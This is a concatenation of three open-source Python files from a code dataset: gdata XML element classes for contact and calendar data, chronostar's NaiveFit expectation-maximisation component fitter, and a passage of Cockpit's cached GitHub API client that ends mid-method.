class EmailImParent(atom.core.XmlElement):
    """Base class holding the attributes shared by gd:email and gd:im."""
    address = 'address'
    label = 'label'
    rel = 'rel'
    primary = 'primary'
class Email(EmailImParent):
    """The gd:email element.

    An email address associated with the containing entity (which is
    usually an entity representing a person or a location).
    """
    _qname = GDATA_TEMPLATE % 'email'
    display_name = 'displayName'
class FamilyName(atom.core.XmlElement):
    """The gd:familyName element.

    Specifies family name of the person, eg. "Smith".
    """
    _qname = GDATA_TEMPLATE % 'familyName'
    yomi = 'yomi'
class Im(EmailImParent):
    """The gd:im element.

    An instant messaging address associated with the containing entity.
    """
    _qname = GDATA_TEMPLATE % 'im'
    # One of the *_PROTOCOL constants defined at module level.
    protocol = 'protocol'
class GivenName(atom.core.XmlElement):
    """The gd:givenName element.

    Specifies given name of the person, eg. "John".
    """
    _qname = GDATA_TEMPLATE % 'givenName'
    yomi = 'yomi'
class NamePrefix(atom.core.XmlElement):
    """The gd:namePrefix element.

    Honorific prefix, eg. 'Mr' or 'Mrs'.
    """
    _qname = GDATA_TEMPLATE % 'namePrefix'
class NameSuffix(atom.core.XmlElement):
    """The gd:nameSuffix element.

    Honorific suffix, eg. 'san' or 'III'.
    """
    _qname = GDATA_TEMPLATE % 'nameSuffix'
class FullName(atom.core.XmlElement):
    """The gd:fullName element.

    Unstructured representation of the name.
    """
    _qname = GDATA_TEMPLATE % 'fullName'
class Name(atom.core.XmlElement):
    """The gd:name element.

    Allows storing person's name in a structured way. Consists of
    given name, additional name, family name, prefix, suffix and full name.
    """
    _qname = GDATA_TEMPLATE % 'name'
    given_name = GivenName
    additional_name = AdditionalName
    family_name = FamilyName
    name_prefix = NamePrefix
    name_suffix = NameSuffix
    full_name = FullName
class OrgDepartment(atom.core.XmlElement):
    """The gd:orgDepartment element.

    Describes a department within an organization. Must appear within a
    gd:organization element.
    """
    _qname = GDATA_TEMPLATE % 'orgDepartment'
class OrgJobDescription(atom.core.XmlElement):
    """The gd:orgJobDescription element.

    Describes a job within an organization. Must appear within a
    gd:organization element.
    """
    _qname = GDATA_TEMPLATE % 'orgJobDescription'
class OrgName(atom.core.XmlElement):
    """The gd:orgName element.

    The name of the organization. Must appear within a gd:organization
    element.

    Contains a Yomigana attribute (Japanese reading aid) for the
    organization name.
    """
    _qname = GDATA_TEMPLATE % 'orgName'
    yomi = 'yomi'
class OrgSymbol(atom.core.XmlElement):
    """The gd:orgSymbol element.

    Provides a symbol of an organization. Must appear within a
    gd:organization element.
    """
    _qname = GDATA_TEMPLATE % 'orgSymbol'
class OrgTitle(atom.core.XmlElement):
    """The gd:orgTitle element.

    The title of a person within an organization. Must appear within a
    gd:organization element.
    """
    _qname = GDATA_TEMPLATE % 'orgTitle'
class Organization(atom.core.XmlElement):
    """The gd:organization element.

    An organization, typically associated with a contact.
    """
    _qname = GDATA_TEMPLATE % 'organization'
    # XML attributes of gd:organization.
    label = 'label'
    primary = 'primary'
    rel = 'rel'
    # Nested gd:org* child elements.
    department = OrgDepartment
    job_description = OrgJobDescription
    name = OrgName
    symbol = OrgSymbol
    title = OrgTitle
class When(atom.core.XmlElement):
    """The gd:when element.

    Represents a period of time or an instant.
    """
    _qname = GDATA_TEMPLATE % 'when'
    # Note the XML attribute names differ from the Python member names here.
    end = 'endTime'
    start = 'startTime'
    value = 'valueString'
class OriginalEvent(atom.core.XmlElement):
    """The gd:originalEvent element.

    Equivalent to the Recurrence ID property specified in section 4.8.4.4
    of RFC 2445. Appears in every instance of a recurring event, to identify
    the original event.

    Contains a <gd:when> element specifying the original start time of the
    instance that has become an exception.
    """
    _qname = GDATA_TEMPLATE % 'originalEvent'
    id = 'id'
    href = 'href'
    when = When
class PhoneNumber(atom.core.XmlElement):
    """The gd:phoneNumber element.

    A phone number associated with the containing entity (which is usually
    an entity representing a person or a location).
    """
    _qname = GDATA_TEMPLATE % 'phoneNumber'
    label = 'label'
    rel = 'rel'
    uri = 'uri'
    primary = 'primary'
class PostalAddress(atom.core.XmlElement):
    """The gd:postalAddress element."""
    _qname = GDATA_TEMPLATE % 'postalAddress'
    label = 'label'
    rel = 'rel'
    uri = 'uri'
    primary = 'primary'
class Rating(atom.core.XmlElement):
    """The gd:rating element.

    Represents a numeric rating of the enclosing entity, such as a
    comment. Each rating supplies its own scale, although it may be
    normalized by a service; for example, some services might convert all
    ratings to a scale from 1 to 5.
    """
    _qname = GDATA_TEMPLATE % 'rating'
    # XML attributes describing the rating value and its scale.
    average = 'average'
    max = 'max'
    min = 'min'
    num_raters = 'numRaters'
    rel = 'rel'
    value = 'value'
class Recurrence(atom.core.XmlElement):
    """The gd:recurrence element.

    Represents the dates and times when a recurring event takes place.

    The string that defines the recurrence consists of a set of properties,
    each of which is defined in the iCalendar standard (RFC 2445).
    Specifically, the string usually begins with a DTSTART property that
    indicates the starting time of the first instance of the event, and
    often a DTEND property or a DURATION property to indicate when the
    first instance ends. Next come RRULE, RDATE, EXRULE, and/or EXDATE
    properties, which collectively define a recurring event and its
    exceptions (but see below). (See section 4.8.5 of RFC 2445 for more
    information about these recurrence component properties.) Last comes a
    VTIMEZONE component, providing detailed timezone rules for any timezone
    ID mentioned in the preceding properties.

    Google services like Google Calendar don't generally generate EXRULE
    and EXDATE properties to represent exceptions to recurring events;
    instead, they generate <gd:recurrenceException> elements. However,
    Google services may include EXRULE and/or EXDATE properties anyway;
    for example, users can import events and exceptions into Calendar, and
    if those imported events contain EXRULE or EXDATE properties, then
    Calendar will provide those properties when it sends a <gd:recurrence>
    element.

    Note that the use of <gd:recurrenceException> means that you can't be
    sure just from examining a <gd:recurrence> element whether there are
    any exceptions to the recurrence description. To ensure that you find
    all exceptions, look for <gd:recurrenceException> elements in the feed,
    and use their <gd:originalEvent> elements to match them up with
    <gd:recurrence> elements.
    """
    _qname = GDATA_TEMPLATE % 'recurrence'
class RecurrenceException(atom.core.XmlElement):
    """The gd:recurrenceException element.

    Represents an event that's an exception to a recurring event-that is,
    an instance of a recurring event in which one or more aspects of the
    recurring event (such as attendance list, time, or location) have been
    changed.

    Contains a <gd:originalEvent> element that specifies the original
    recurring event that this event is an exception to.

    When you change an instance of a recurring event, that instance becomes
    an exception. Depending on what change you made to it, the exception
    behaves in either of two different ways when the original recurring
    event is changed:

    - If you add, change, or remove comments, attendees, or attendee
      responses, then the exception remains tied to the original event, and
      changes to the original event also change the exception.
    - If you make any other changes to the exception (such as changing the
      time or location) then the instance becomes "specialized," which means
      that it's no longer as tightly tied to the original event. If you
      change the original event, specialized exceptions don't change. But
      see below.

    For example, say you have a meeting every Tuesday and Thursday at
    2:00 p.m. If you change the attendance list for this Thursday's meeting
    (but not for the regularly scheduled meeting), then it becomes an
    exception. If you change the time for this Thursday's meeting (but not
    for the regularly scheduled meeting), then it becomes specialized.

    Regardless of whether an exception is specialized or not, if you do
    something that deletes the instance that the exception was derived from,
    then the exception is deleted. Note that changing the day or time of a
    recurring event deletes all instances, and creates new ones.

    For example, after you've specialized this Thursday's meeting, say you
    change the recurring meeting to happen on Monday, Wednesday, and Friday.
    That change deletes all of the recurring instances of the
    Tuesday/Thursday meeting, including the specialized one.

    If a particular instance of a recurring event is deleted, then that
    instance appears as a <gd:recurrenceException> containing a
    <gd:entryLink> that has its <gd:eventStatus> set to
    "http://schemas.google.com/g/2005#event.canceled". (For more
    information about canceled events, see RFC 2445.)
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'recurrenceException'
    # XML attribute name: whether this exception is "specialized" (see above).
    specialized = 'specialized'
    # Child elements (classes declared earlier in this module).
    entry_link = EntryLink
    original_event = OriginalEvent
class Reminder(atom.core.XmlElement):
    """The gd:reminder element.

    A time interval, indicating how long before the containing entity's start
    time or due time attribute a reminder should be issued. Alternatively,
    may specify an absolute time at which a reminder should be issued. Also
    specifies a notification method, indicating what medium the system
    should use to remind the user.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'reminder'
    # XML attribute names mapped onto this element.
    absolute_time = 'absoluteTime'
    method = 'method'
    days = 'days'
    hours = 'hours'
    minutes = 'minutes'
class Transparency(atom.core.XmlElement):
    """The gd:transparency element.

    Extensible enum corresponding to the TRANSP property defined in RFC 2445.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'transparency'
    # XML attribute holding the transparency value.
    value = 'value'
class Agent(atom.core.XmlElement):
    """The gd:agent element.

    The agent who actually receives the mail. Used in work addresses.
    Also for 'in care of' or 'c/o'.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'agent'
class HouseName(atom.core.XmlElement):
    """The gd:housename element.

    Used in places where houses or buildings have names (and not
    necessarily numbers), eg. "The Pillars".
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'housename'
class Street(atom.core.XmlElement):
    """The gd:street element.

    Can be street, avenue, road, etc. This element also includes the
    house number and room/apartment/flat/floor number.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'street'
class PoBox(atom.core.XmlElement):
    """The gd:pobox element.

    Covers actual P.O. boxes, drawers, locked bags, etc. This is usually
    but not always mutually exclusive with street.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'pobox'
class Neighborhood(atom.core.XmlElement):
    """The gd:neighborhood element.

    This is used to disambiguate a street address when a city contains more
    than one street with the same name, or to specify a small place whose
    mail is routed through a larger postal town. In China it could be a
    county or a minor city.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'neighborhood'
class City(atom.core.XmlElement):
    """The gd:city element.

    Can be city, village, town, borough, etc. This is the postal town and
    not necessarily the place of residence or place of business.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'city'
class Subregion(atom.core.XmlElement):
    """The gd:subregion element.

    Handles administrative districts such as U.S. or U.K. counties that are
    not used for mail addressing purposes. Subregion is not intended for
    delivery addresses.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'subregion'
class Region(atom.core.XmlElement):
    """The gd:region element.

    A state, province, county (in Ireland), Land (in Germany),
    departement (in France), etc.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'region'
class Postcode(atom.core.XmlElement):
    """The gd:postcode element.

    Postal code. Usually country-wide, but sometimes specific to the
    city (e.g. "2" in "Dublin 2, Ireland" addresses).
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'postcode'
class Country(atom.core.XmlElement):
    """The gd:country element.

    The name or code of the country.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'country'
class FormattedAddress(atom.core.XmlElement):
    """The gd:formattedAddress element.

    The full, unstructured postal address.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'formattedAddress'
class StructuredPostalAddress(atom.core.XmlElement):
    """The gd:structuredPostalAddress element.

    Postal address split into components. It allows storing the address
    in a locale independent format. The fields can be interpreted and used
    to generate a formatted, locale dependent address. The following elements
    represent parts of the address: agent, house name, street, P.O. box,
    neighborhood, city, subregion, region, postal code, country. The
    subregion element is not used for postal addresses, it is provided for
    extended uses of addresses only. In order to store a postal address in an
    unstructured form the formatted address field is provided.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'structuredPostalAddress'
    # XML attribute names mapped onto this element.
    rel = 'rel'
    mail_class = 'mailClass'
    usage = 'usage'
    label = 'label'
    primary = 'primary'
    # Child elements describing the individual address components
    # (classes declared above in this module).
    agent = Agent
    house_name = HouseName
    street = Street
    po_box = PoBox
    neighborhood = Neighborhood
    city = City
    subregion = Subregion
    region = Region
    postcode = Postcode
    country = Country
    formatted_address = FormattedAddress
class Where(atom.core.XmlElement):
    """The gd:where element.

    A place (such as an event location) associated with the containing
    entity. The type of the association is determined by the rel attribute;
    the details of the location are contained in an embedded or linked-to
    Contact entry.

    A <gd:where> element is more general than a <gd:geoPt> element. The
    former identifies a place using a text description and/or a Contact
    entry, while the latter identifies a place using a specific geographic
    location.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'where'
    # XML attribute names mapped onto this element.
    label = 'label'
    rel = 'rel'
    value = 'valueString'
    # Child element pointing at the Contact entry with the details.
    entry_link = EntryLink
class AttendeeType(atom.core.XmlElement):
    """The gd:attendeeType element."""
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'attendeeType'
    # XML attribute holding the attendee type value.
    value = 'value'
class AttendeeStatus(atom.core.XmlElement):
    """The gd:attendeeStatus element."""
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'attendeeStatus'
    # XML attribute holding the attendee status value.
    value = 'value'
class EventStatus(atom.core.XmlElement):
    """The gd:eventStatus element."""
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'eventStatus'
    # XML attribute holding the event status value.
    value = 'value'
class Visibility(atom.core.XmlElement):
    """The gd:visibility element."""
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'visibility'
    # XML attribute holding the visibility value.
    value = 'value'
class Who(atom.core.XmlElement):
    """The gd:who element.

    A person associated with the containing entity. The type of the
    association is determined by the rel attribute; the details about the
    person are contained in an embedded or linked-to Contact entry.

    The <gd:who> element can be used to specify email senders and
    recipients, calendar event organizers, and so on.
    """
    # Qualified XML tag name in the gdata namespace.
    _qname = GDATA_TEMPLATE % 'who'
    # XML attribute names mapped onto this element.
    email = 'email'
    rel = 'rel'
    value = 'valueString'
    # Child elements (classes declared above in this module).
    attendee_status = AttendeeStatus
    attendee_type = AttendeeType
    entry_link = EntryLink
class Deleted(atom.core.XmlElement):
    """gd:deleted when present, indicates the containing entry is deleted."""
    # NOTE: uses GD_TEMPLATE (not GDATA_TEMPLATE like most siblings above).
    _qname = GD_TEMPLATE % 'deleted'
class Money(atom.core.XmlElement):
    """The gd:money element: describes an amount of money with a currency."""
    # NOTE: uses GD_TEMPLATE (not GDATA_TEMPLATE like most siblings above).
    _qname = GD_TEMPLATE % 'money'
    # XML attribute names mapped onto this element.
    amount = 'amount'
    currency_code = 'currencyCode'
class MediaSource(object):
    """Wraps a media file (handle or path) together with its metadata.

    GData entries can refer to media sources; instances of this class
    carry the open file handle alongside its MIME type, size and name.
    """

    def __init__(self, file_handle=None, content_type=None, content_length=None,
                 file_path=None, file_name=None):
        """Creates an object of type MediaSource.

        Args:
          file_handle: A file handle pointing to the file to be encapsulated
              in the MediaSource.
          content_type: string The MIME type of the file. Required if a
              file_handle is given.
          content_length: int The size of the file. Required if a file_handle
              is given.
          file_path: string (optional) A full path name to the file. Used in
              place of a file_handle.
          file_name: string The name of the file without any path information.
              Required if a file_handle is given.
        """
        self.content_type = content_type
        self.content_length = content_length
        self.file_name = file_name
        self.file_handle = file_handle
        # When no handle was supplied but a path and MIME type were,
        # open the file ourselves and derive length/name from the path.
        open_from_path = (file_handle is None
                          and content_type is not None
                          and file_path is not None)
        if open_from_path:
            self.set_file_handle(file_path, content_type)

    def set_file_handle(self, file_name, content_type):
        """Open ``file_name`` and populate handle, type, length and name.

        Args:
          file_name: string The path and file name to the file containing
              the media.
          content_type: string A MIME type representing the type of the media.
        """
        self.file_handle = open(file_name, 'rb')
        self.content_type = content_type
        self.content_length = os.path.getsize(file_name)
        self.file_name = os.path.basename(file_name)

    # CamelCase alias kept for backwards compatibility.
    SetFileHandle = set_file_handle

    def modify_request(self, http_request):
        """Attach this media source as a body part of ``http_request``."""
        http_request.add_body_part(self.file_handle, self.content_type,
                                   self.content_length)
        return http_request

    # CamelCase alias kept for backwards compatibility.
    ModifyRequest = modify_request
| apache-2.0 |
mikeireland/chronostar | chronostar/naivefit.py | 1 | 10262 | """
naivefit.py
A NaiveFit follows the approach described in Crundall et al. (2019).
NaiveFit begins with an initial guess provided by user of an N component fit.
If no guess is provided, all provided stars are assumed to be members of one
component.
NaiveFit will perform an Expectation Maximisation on this N component fit until
converged.
Then NaiveFit will test increasing the component count to N+1. This is done by
for each component out of the N existing, substituting it for 2 similar
components with slight age offsets, and running an EM fit. The result
is N separate "N+1 component" fits. The best one will be compared to the
"N component" fit using the Bayesian Information Criterion (BIC). If the
BIC has improved, this "N+1 component fit" will be taken as the best fit so far.
This process iterates until adding a component fails to yield a better fit.
"""
import numpy as np
import os
import sys
import logging
from distutils.dir_util import mkpath
import random
import uuid
#~ from emcee.utils import MPIPool
from multiprocessing import Pool
from multiprocessing import cpu_count
sys.path.insert(0, os.path.abspath('..'))
from . import expectmax
from . import readparam
from . import tabletool
from . import component
from . import traceorbit
from chronostar.parentfit import ParentFit
# python3 throws FileNotFoundError that is essentially the same as IOError
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
#ACW: put these into a helper module /start
def dummy_trace_orbit_func(loc, times=None):
    """Stand-in orbit tracer used purely for testing.

    Skips the real (expensive) orbit integration. To keep age from being a
    completely free-floating parameter, a large offset is applied whenever
    all requested times exceed 1.
    """
    if times is not None and np.all(times > 1.):
        return loc + 1000.
    return loc
def log_message(msg, symbol='.', surround=False):
    """Log ``msg`` via logging.info, centred between runs of ``symbol``.

    With ``surround`` True the message line is additionally sandwiched
    between two full-width bars of ``symbol``.
    """
    decorated = '{}{:^40}{}'.format(symbol * 5, msg, symbol * 5)
    if surround:
        bar = symbol * 50
        decorated = '\n{}\n{}\n{}'.format(bar, decorated, bar)
    logging.info(decorated)
#ACW: /end
class NaiveFit(ParentFit):
    """Iterative component-count fit following Crundall et al. (2019).

    Starts from an initial fit (by default a single component covering all
    stars), then repeatedly trials splitting each existing component in
    two, accepting a split whenever the BIC improves, until no split helps
    or the configured maximum component count is reached.
    """

    def __init__(self, fit_pars):
        """
        Parameters
        ----------
        fit_pars : str -or- dictionary
            If a string, `fit_pars` should be a path to a parameter file which
            can be parsed by readparam.readParam, to construct a dictionary.
            Alternatively, an actual dictionary can be passed in. See README.md
            for a description of parameters.
        """
        super(NaiveFit, self).__init__(fit_pars)

    def run_fit(self):
        """
        Perform a fit (as described in Paper I) to a set of prepared data.

        Results are outputted as two dictionaries
        results = {'comps':best_fit, (list of components)
                   'med_and_spans':median and spans of model parameters,
                   'memb_probs': membership probability array (the standard one)}
        scores = {'bic': the bic,
                  'lnlike': log likelihood of that run,
                  'lnpost': log posterior of that run}
        """
        log_message('Beginning Chronostar run',
                    symbol='_', surround=True)

        # ------------------------------------------------------------
        # -----  EXECUTE RUN  ----------------------------------------
        # ------------------------------------------------------------

        if self.fit_pars['store_burnin_chains']:
            log_message(msg='Storing burnin chains', symbol='-')

        # ACW: Make this a function (~50 lines)
        # ------------------------------------------------------------
        # -----  STAGE 1: ESTABLISHING INITIAL FIT  ------------------
        # ------------------------------------------------------------

        # Handle special case of very first run
        # Either by fitting one component (default) or by using `init_comps`
        # to initialise the EM fit.

        # Check if not provided with init comps or membs
        if (self.fit_pars['init_comps'] is None) and (self.fit_pars['init_memb_probs'] is None):
            # NaiveFit doesn't know how to blindly initialise runs with ncomps > 1
            assert self.ncomps == 1, 'If no initialisation set, can only accept ncomp==1'

            # If no init conditions provided, assume all stars are members and begin
            # fit with 1 component. Nearly all membership weight goes to the
            # single component; a sliver is left for the background column.
            init_memb_probs = np.zeros((len(self.data_dict['means']),
                                        self.ncomps + self.fit_pars[
                                            'use_background']))
            init_memb_probs[:, 0] = 1. - 1.e-10
            init_memb_probs[:, 1] = 1.e-10
            self.fit_pars['init_memb_probs'] = init_memb_probs
            log_message(msg='No initial information provided', symbol='-')
            log_message(msg='Assuming all stars are members', symbol='-')
        # Otherwise, we must have been given an init_comps, or an init_memb_probs
        # to start things with
        else:
            log_message(msg='Initialising with init_comps or init_memb_probs with'
                            '%i components'%self.ncomps, symbol='*', surround=True)
            pass

        # MZ: just testing. Delete after if works
        print("self.fit_pars['init_memb_probs']", self.fit_pars['init_memb_probs'])
        print("self.fit_pars['init_comps']", self.fit_pars['init_comps'])

        log_message(msg='FITTING {} COMPONENT'.format(self.ncomps),
                    symbol='*', surround=True)
        run_dir = self.rdir + '{}/'.format(self.ncomps)

        # Run (or reload a previously stored) EM fit for the initial count.
        prev_result = self.run_em_unless_loadable(run_dir)
        prev_score = self.calc_score(
            prev_result['comps'], prev_result['memb_probs'],
            use_box_background=self.fit_pars['use_box_background']
        )

        self.ncomps += 1

        # ------------------------------------------------------------
        # -----  STAGE 2: EXPLORE EXTRA COMPONENT BY DECOMPOSITION  --
        # ------------------------------------------------------------

        # Calculate global score of fit for comparison with future fits with different
        # component counts

        # Begin iterative loop, each time trialing the incorporation of a new component
        #
        # `prev_result` tracks the previous fit, which is taken to be
        # the best fit so far
        #
        # As new fits are acquired, we call them `new_result`.
        # The new fits are compared against the previous fit, and if determined to
        # be an improvement, they are taken as the best fit, and are renamed to
        # `prev_result`
        stage_2_ncomps = 2
        while stage_2_ncomps <= self.fit_pars['max_comp_count']:
            log_message(msg='FITTING {} COMPONENT'.format(stage_2_ncomps),
                        symbol='*', surround=True)

            all_results = []
            all_scores = []

            # Iteratively try subdividing each previous component
            # target_comp is the component we will split into two.
            # This will make a total of ncomps (the target comp split into 2,
            # plus the remaining components from prev_result['comps'])
            for i, target_comp in enumerate(prev_result['comps']):
                # Candidate splits are labelled 'A', 'B', ... and each gets
                # its own run directory.
                div_label = chr(ord('A') + i)
                run_dir = self.rdir + '{}/{}/'.format(stage_2_ncomps, div_label)
                log_message(msg='Subdividing stage {}'.format(div_label),
                            symbol='+', surround=True)
                mkpath(run_dir)

                self.fit_pars['init_comps'] = self.build_init_comps(
                    prev_result['comps'], split_comp_ix=i,
                    prev_med_and_spans=prev_result['med_and_spans'],
                    memb_probs = prev_result['memb_probs'])
                self.ncomps = len(self.fit_pars['init_comps'])

                result = self.run_em_unless_loadable(run_dir)
                all_results.append(result)

                score = self.calc_score(
                    result['comps'], result['memb_probs'],
                    use_box_background=self.fit_pars['use_box_background']
                )
                all_scores.append(score)

                logging.info(
                    'Decomposition {} finished with \nBIC: {}\nlnlike: {}\n'
                    'lnpost: {}'.format(
                        div_label, all_scores[-1]['bic'],
                        all_scores[-1]['lnlike'], all_scores[-1]['lnpost'],
                    ))

            # ------------------------------------------------------------
            # -----  STAGE 2a: COMBINE RESULTS OF EACH GOOD SPLIT  -------
            # ------------------------------------------------------------

            # identify all the improving splits (lowest BIC wins; nanargmin
            # skips any splits whose BIC came out as NaN)
            all_bics = np.array([score['bic'] for score in all_scores])
            best_split_ix = np.nanargmin(all_bics)

            new_result = all_results[best_split_ix]
            new_score = all_scores[best_split_ix]

            self.iter_end_log(best_split_ix, prev_result=prev_result, new_result=new_result)

            # Check if the fit has improved
            self.log_score_comparison(new=new_score,
                                      prev=prev_score)
            if new_score['bic'] < prev_score['bic']:
                # Accept the best split as the new reference fit and try to
                # add yet another component on the next loop iteration.
                prev_score = new_score
                prev_result = new_result
                stage_2_ncomps += 1
                log_message(msg="Commencing {} component fit on {}{}".format(
                    self.ncomps, self.ncomps - 1,
                    chr(ord('A') + best_split_ix)), symbol='+'
                )
            else:
                # No improvement: the previous fit stands as the final one.
                # WRITING THE FINAL RESULTS INTO FILES
                self.write_results_to_file(prev_result, prev_score)
                break

            logging.info("Best fit:\n{}".format(
                [group.get_pars() for group in prev_result['comps']]))

        if stage_2_ncomps >= self.fit_pars['max_comp_count']:
            log_message(msg='REACHED MAX COMP LIMIT', symbol='+',
                        surround=True)

        return prev_result, prev_score
| mit |
SotolitoLabs/cockpit | bots/task/github.py | 2 | 13357 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# This file is part of Cockpit.
#
# Copyright (C) 2015 Red Hat, Inc.
#
# Cockpit is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
#
# Cockpit is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Cockpit; If not, see <http://www.gnu.org/licenses/>.
# Shared GitHub code. When run as a script, we print out info about
# our GitHub interacition.
import errno
import http.client
import json
import os
import socket
import sys
import time
import urllib.parse
from . import cache
# Public API of this module.
__all__ = (
    'GitHub',
    'Checklist',
    'TESTING',
    'NO_TESTING',
    'NOT_TESTED'
)

# Human-readable status strings used for commit statuses.
TESTING = "Testing in progress"
NOT_TESTED = "Not yet tested"
NO_TESTING = "Manual testing required"

# Commit-status context prefixes recognised as ours (see known_context).
OUR_CONTEXTS = [
    "verify/",
    "avocado/",
    "container/",
    "selenium/",
    # generic prefix for external repos
    "cockpit/",
]

# Title template for automated image refresh issues.
ISSUE_TITLE_IMAGE_REFRESH = "Image refresh for {0}"

# Repository root directory (two levels up from this module).
BASE = os.path.normpath(os.path.join(os.path.dirname(__file__), "..", ".."))

# Location of the GitHub access token used for authenticated requests.
TOKEN = "~/.config/github-token"

# GitHub team whose membership forms the whitelist (see GitHub.whitelist).
TEAM_CONTRIBUTORS = "Contributors"
def known_context(context):
    """Return True when `context` starts with one of OUR_CONTEXTS prefixes."""
    return any(context.startswith(prefix) for prefix in OUR_CONTEXTS)
class Logger(object):
    """Append-only log file named "<hostname>-<YYYYMM>.log" in `directory`."""

    def __init__(self, directory):
        """Prepare the log path, creating `directory` if necessary."""
        hostname = socket.gethostname().split(".")[0]
        month = time.strftime("%Y%m")
        self.path = os.path.join(directory, "{0}-{1}.log".format(hostname, month))

        # exist_ok avoids the check-then-create race the previous
        # os.path.exists() guard had when several processes start at once.
        os.makedirs(directory, exist_ok=True)

    # Yes, we open the file each time
    def write(self, value):
        """Append `value` verbatim to the log file."""
        with open(self.path, 'a') as f:
            f.write(value)
class GitHub(object):
    """Minimal GitHub REST API client with on-disk response caching.

    Requests are authenticated with the token from ~/.config/github-token
    when present, GET responses are cached and revalidated with
    ETag/If-Modified-Since, and every request is appended to a debug log.
    """

    def __init__(self, base=None, cacher=None, repo=None):
        # Default API base: https://api.github.com/repos/<repo>/, with both
        # parts overridable through GITHUB_API / GITHUB_BASE env vars.
        if base is None:
            if repo is None:
                repo = os.environ.get("GITHUB_BASE", "cockpit-project/cockpit")
            netloc = os.environ.get("GITHUB_API", "https://api.github.com")
            base = "{0}/repos/{1}/".format(netloc, repo)
        self.url = urllib.parse.urlparse(base)
        self.conn = None
        self.token = None
        self.debug = False
        # Read the access token if present; a missing file just means
        # unauthenticated access, any other error propagates.
        try:
            gt = open(os.path.expanduser(TOKEN), "r")
            self.token = gt.read().strip()
            gt.close()
        except IOError as exc:
            if exc.errno == errno.ENOENT:
                pass
            else:
                raise
        self.available = self.token and True or False

        # The cache directory is $TEST_DATA/github ~/.cache/github
        if not cacher:
            data = os.environ.get("TEST_DATA", os.path.expanduser("~/.cache"))
            cacher = cache.Cache(os.path.join(data, "github"))
        self.cache = cacher

        # Create a log for debugging our GitHub access
        self.log = Logger(self.cache.directory)
        self.log.write("")

    def qualify(self, resource):
        """Join `resource` onto this client's base API path."""
        return urllib.parse.urljoin(self.url.path, resource)

    def request(self, method, resource, data="", headers=None):
        """Perform one HTTP request; return a dict with status/reason/headers/data.

        Retries once on connection drops of an idle keep-alive connection;
        errors on a freshly opened connection are raised.
        """
        if headers is None:
            headers = { }
        headers["User-Agent"] = "Cockpit Tests"
        if self.token:
            headers["Authorization"] = "token " + self.token
        connected = False
        while not connected:
            # (Re)open the connection if we don't have one; `connected`
            # marks that this attempt uses a brand-new connection, in which
            # case a failure is genuine and must not be retried.
            if not self.conn:
                if self.url.scheme == 'http':
                    self.conn = http.client.HTTPConnection(self.url.netloc)
                else:
                    self.conn = http.client.HTTPSConnection(self.url.netloc)
                connected = True
            self.conn.set_debuglevel(self.debug and 1 or 0)
            try:
                self.conn.request(method, self.qualify(resource), data, headers)
                response = self.conn.getresponse()
                break
            # This happens when GitHub disconnects in python3
            except ConnectionResetError:
                if connected:
                    raise
                self.conn = None
            # This happens when GitHub disconnects a keep-alive connection
            except http.client.BadStatusLine:
                if connected:
                    raise
                self.conn = None
            # This happens when TLS is the source of a disconnection
            except socket.error as ex:
                if connected or ex.errno != errno.EPIPE:
                    raise
                self.conn = None
        # Normalise header names to lower case for the caller.
        heads = { }
        for (header, value) in response.getheaders():
            heads[header.lower()] = value
        # Append an access-log style line for debugging.
        self.log.write('{0} - - [{1}] "{2} {3} HTTP/1.1" {4} -\n'.format(
            self.url.netloc,
            time.asctime(),
            method,
            resource,
            response.status
        ))
        return {
            "status": response.status,
            "reason": response.reason,
            "headers": heads,
            "data": response.read().decode('utf-8')
        }

    def get(self, resource):
        """GET `resource` and return the parsed JSON body (None for 404).

        Uses the on-disk cache: fresh entries are returned directly, stale
        ones are revalidated with ETag / Last-Modified conditional requests.
        """
        headers = { }
        qualified = self.qualify(resource)
        cached = self.cache.read(qualified)
        if cached:
            if self.cache.current(qualified):
                return json.loads(cached['data'] or "null")
            etag = cached['headers'].get("etag", None)
            modified = cached['headers'].get("last-modified", None)
            if etag:
                headers['If-None-Match'] = etag
            elif modified:
                headers['If-Modified-Since'] = modified
        response = self.request("GET", resource, "", headers)
        if response['status'] == 404:
            return None
        elif cached and response['status'] == 304: # Not modified
            # Refresh the cache timestamp and serve the cached body.
            self.cache.write(qualified, cached)
            return json.loads(cached['data'] or "null")
        elif response['status'] < 200 or response['status'] >= 300:
            sys.stderr.write("{0}\n{1}\n".format(resource, response['data']))
            raise RuntimeError("GitHub API problem: {0}".format(response['reason'] or response['status']))
        else:
            self.cache.write(qualified, response)
